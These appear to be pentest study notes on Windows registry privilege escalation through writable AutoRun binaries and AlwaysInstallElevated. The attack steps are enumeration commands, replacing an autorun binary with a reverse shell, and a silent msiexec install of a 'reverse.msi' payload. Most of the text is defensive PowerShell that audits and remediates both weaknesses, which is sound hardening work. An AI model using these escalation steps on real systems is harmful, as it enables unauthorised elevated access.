Registry Exploits

AutoRuns

  • Startup apps, or "AutoRuns", are configured in the registry.

  • If an autorun executable is writable by our user and we have the privilege to restart the system, we can replace it with a reverse shell and restart the system to get a shell.

# Get a list of Autorun programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Check the permissions on each binary using accesschk
.\accesschk -quv "C:\Program Files\program.exe"

# Overwrite a writable binary with the reverse shell and restart the system
SHELL!
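The same check from the defender's side, as an added PowerShell example that is not part of the original notes: it walks the Run keys, extracts the executable from each command string, and reports any binary whose ACL grants write, modify or full control to a low-privileged principal. It goes beyond the single HKLM Run key above by also covering RunOnce, the WOW6432Node key and HKCU; the list of "low-privileged" principals is an assumption of this example and can be extended.

```powershell
# Added example (not from the original notes): find autorun binaries that
# low-privileged principals can modify. Assumes an elevated PowerShell on
# the host being audited; the principal list below is an assumption.

$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)

# Principals that should never be able to modify an autorun binary (assumption).
$lowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets the holder change what runs at logon.
$writeRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership

function Get-ExecutableFromCommand {
    # Pull the program path out of a Run-key command such as
    #   "C:\Program Files\Foo\foo.exe" /tray   or   %SystemRoot%\bar.exe -x
    param([string]$Command)
    $cmd = [Environment]::ExpandEnvironmentVariables($Command.Trim())
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
        return $cmd.Trim('"')
    }
    # Unquoted: the whole string if it names a file, otherwise the first token.
    if (Test-Path -LiteralPath $cmd -PathType Leaf) { return $cmd }
    return ($cmd -split '\s+', 2)[0]
}

function Test-WritableByLowPriv {
    # Returns the first low-privileged principal with write-class rights, or $null.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # Cast to int so generic rights (which render as raw numbers) still compare.
        if (([int]$ace.FileSystemRights -band [int]$writeRights) -ne 0) {
            return $ace.IdentityReference.Value
        }
    }
    return $null
}

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        # Skip the provider metadata that Get-ItemProperty adds to every object.
        if ($p.Name -in 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider') { continue }
        $exe = Get-ExecutableFromCommand ([string]$p.Value)
        if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) {
            Write-Warning "$key\$($p.Name): target '$exe' not found (stale entry or unparsed command)"
            continue
        }
        $who = Test-WritableByLowPriv -Path $exe
        if ($who) {
            [pscustomobject]@{ Key = $key; Value = $p.Name; Binary = $exe; WritableBy = $who }
        }
    }
}
```

Each reported row is a binary that any local user could swap out before the next logon. The fix is on the file, not the registry: remove the offending grant (or re-inherit the vendor's default ACL from the parent directory) and re-run the audit. A stale entry whose target no longer exists is also worth cleaning up, since the parent directory's permissions then decide who can create a file at that path.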

AlwaysInstalledElevated

  • MSI files are Windows Installer packages used to install applications.

  • They normally run with the privileges of the user executing the file.

  • Windows can be configured to run these installers with elevated privileges regardless of who starts them.

  • Two Registry requirements:

"AlwaysInstallElevated" should be 0x1 in both of the following keys (the policy has no effect unless both are set):
# Local Machine
HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
# Current User
HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

# Can be queried using the reg command (repeat for HKCU)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Generate a payload in MSI format

# Install it with msiexec
msiexec /quiet /qn /i reverse.msi
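An audit-and-fix script for the two keys above, as an added PowerShell example that is not part of the original notes. It reads AlwaysInstallElevated from both hives, reports whether the policy is actually effective (it is only effective when both values are 1), and with -Remediate sets both to 0. The -Remediate switch is a parameter of this example, not a built-in; it assumes an elevated PowerShell on the host being audited.

```powershell
# Added example (not from the original notes): report, and optionally
# disable, the AlwaysInstallElevated policy. -Remediate is this script's own
# parameter. Assumes an elevated PowerShell on the audited host.
param([switch]$Remediate)

$policyPaths = @{
    Machine = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    User    = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

function Get-AlwaysInstallElevated {
    # Returns the DWORD value, or $null when the key or value is absent.
    param([string]$Path)
    if (-not (Test-Path $Path)) { return $null }
    $item = Get-ItemProperty -Path $Path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.AlwaysInstallElevated
}

$state = @{}
foreach ($scope in $policyPaths.Keys) {
    $state[$scope] = Get-AlwaysInstallElevated -Path $policyPaths[$scope]
}

# msiexec only honours the policy when BOTH the machine and user values are 1.
$effective = ($state.Machine -eq 1) -and ($state.User -eq 1)

[pscustomobject]@{
    MachineValue = $state.Machine
    UserValue    = $state.User
    Effective    = $effective
}

if ($effective -and $Remediate) {
    foreach ($scope in $policyPaths.Keys) {
        Set-ItemProperty -Path $policyPaths[$scope] -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
    Write-Host 'AlwaysInstallElevated set to 0 in both hives.'
}
```

Two caveats. The HKCU half only reflects the account running the script, so a fleet audit has to inspect each user's hive (or, more simply, confirm the machine value is 0, which on its own defeats the policy). And if the value was delivered by Group Policy ("Always install with elevated privileges" under Windows Components > Windows Installer, in both Computer and User Configuration), it will be re-applied on the next refresh unless the GPO itself is set to Disabled.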
